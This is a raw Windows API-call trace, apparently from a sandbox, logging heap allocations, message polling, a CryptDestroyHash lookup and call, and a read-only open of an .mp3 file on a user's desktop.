[0075.910] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0075.910] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb448 [0075.910] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df40 [0075.910] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0075.910] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4f8 [0075.910] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb448 [0075.910] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e498 [0075.910] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0075.910] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b138 [0075.910] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb448 [0075.910] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0075.910] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb448 [0075.910] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e630 [0075.910] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.910] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0075.910] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5f8 [0075.910] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb518 [0075.910] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0075.910] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0075.910] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0075.910] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0075.910] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0075.910] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de78 [0075.910] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb518 [0075.910] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0075.910] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5f8 [0075.910] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5b8 [0075.911] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0075.911] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0075.911] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0075.911] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0075.911] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.911] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0075.911] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5b8 [0075.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0075.911] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x11) returned 0x6f96a8 [0075.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x6f96a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0075.911] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0075.911] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df18 [0075.911] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0075.911] GetProcAddress (hModule=0x77710000, lpProcName="CryptDestroyHash") returned 0x7771df66 [0075.911] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df18 | out: hHeap=0x650000) returned 1 [0075.911] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.911] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df18 [0075.911] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5b8 [0075.911] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.911] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df18 | out: hHeap=0x650000) returned 1 [0075.911] CryptDestroyHash (hHash=0x6b89f8) returned 1 [0075.911] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb458 [0075.911] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0075.911] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0075.911] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0075.911] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0075.911] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ada8 [0075.911] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5f8 [0075.912] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ada8 | out: hHeap=0x650000) returned 1 [0075.912] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0075.912] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0075.912] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0075.912] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ada8 [0075.912] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0075.912] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5f8 [0075.912] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0075.912] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0075.912] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ada8 | out: hHeap=0x650000) returned 1 [0075.912] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0075.912] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de78 | out: hHeap=0x650000) returned 1 [0075.912] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0075.912] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0075.912] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e018 | out: hHeap=0x650000) returned 1 [0075.912] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0c0 | out: hHeap=0x650000) returned 1 [0075.912] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0075.912] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0075.912] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.912] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0075.912] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4f8 | out: hHeap=0x650000) returned 1 [0075.912] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0075.912] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e030 | out: hHeap=0x650000) returned 1 [0075.912] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0075.912] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0075.912] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.912] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x792238 | out: hHeap=0x650000) returned 1 [0075.912] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0075.912] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0075.912] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e348 | out: hHeap=0x650000) returned 1 [0075.912] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0075.912] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0a8 | out: hHeap=0x650000) returned 1 [0075.912] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0075.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0075.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0075.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfd0 | out: hHeap=0x650000) returned 1 [0075.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0075.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0075.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0075.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0d8 | out: hHeap=0x650000) returned 1 [0075.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0075.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0075.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6f0 | out: hHeap=0x650000) returned 1 [0075.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e060 | out: hHeap=0x650000) returned 1 [0075.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0075.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0075.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0075.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b588 | out: hHeap=0x650000) returned 1 [0075.913] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.913] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb458 [0075.913] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e030 [0075.913] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e120 [0075.913] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0075.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.913] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0075.913] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0075.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.913] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0075.913] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0075.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0075.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0075.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e030 | out: hHeap=0x650000) returned 1 [0075.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0075.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0075.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0075.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0075.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0075.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6c0 | out: hHeap=0x650000) returned 1 [0075.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0075.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9728 | out: hHeap=0x650000) returned 1 [0075.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x792010 | out: hHeap=0x650000) returned 1 [0075.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0075.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa30 | out: hHeap=0x650000) returned 1 [0075.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e090 | out: hHeap=0x650000) returned 1 [0075.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db80 | out: hHeap=0x650000) returned 1 [0075.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0075.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0075.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68b4b0 | out: hHeap=0x650000) returned 1 [0075.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb638 | out: hHeap=0x650000) returned 1 [0075.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0075.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0075.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0075.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0075.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0075.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfe0 | out: hHeap=0x650000) returned 1 [0075.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0075.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68def0 | out: hHeap=0x650000) returned 1 [0075.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d928 | out: hHeap=0x650000) returned 1 [0075.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0075.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6d8 | out: hHeap=0x650000) returned 1 [0075.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0075.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc48 | out: hHeap=0x650000) returned 1 [0075.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0075.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0075.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de00 | out: hHeap=0x650000) returned 1 [0075.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abf8 | out: hHeap=0x650000) returned 1 [0075.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc70 | out: hHeap=0x650000) returned 1 [0075.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df68 | out: hHeap=0x650000) returned 1 [0075.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0075.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddd8 | out: hHeap=0x650000) returned 1 [0075.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd38 | out: hHeap=0x650000) returned 1 [0075.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0075.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0075.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc20 | out: hHeap=0x650000) returned 1 [0075.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd60 | out: hHeap=0x650000) returned 1 [0075.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad60 | out: hHeap=0x650000) returned 1 [0075.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0075.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de50 | out: hHeap=0x650000) returned 1 [0075.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e150 | out: hHeap=0x650000) returned 1 [0075.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db08 | out: hHeap=0x650000) returned 1 [0075.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0075.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0075.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0075.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dab8 | out: hHeap=0x650000) returned 1 [0075.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0075.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0075.915] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.915] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb388 [0075.915] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1f38 [0075.915] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb378 [0075.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1f38 | out: hHeap=0x650000) returned 1 [0075.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0075.915] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b89f8 [0075.916] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.916] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89f8 | out: hHeap=0x650000) returned 1 [0075.916] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.916] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8a38 | out: hHeap=0x650000) returned 1 [0075.916] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.916] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb388 [0075.916] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dab8 [0075.916] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab50 [0075.916] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.916] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0075.916] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.916] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0075.916] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.916] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.916] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8a38 [0075.916] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10000) returned 0x771fe8 [0075.916] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfe8 [0075.916] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb378 [0075.916] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5c0eXZdnCGl.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5c0exzdncgl.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0075.916] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.916] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61e9f8 | out: lpNewFilePointer=0x0) returned 1 [0075.916] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.916] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e150 [0075.916] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0075.916] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0075.916] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0075.917] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0075.917] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dab8 | out: hHeap=0x650000) returned 1 [0075.917] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0075.917] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.917] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb388 [0075.917] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1f38 [0075.917] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0075.917] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1f38 | out: hHeap=0x650000) returned 1 [0075.917] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.917] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0075.917] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b89f8 [0075.917] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.917] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89f8 | out: hHeap=0x650000) returned 1 [0075.917] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.918] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb388 [0075.918] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dab8 [0075.918] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0075.918] 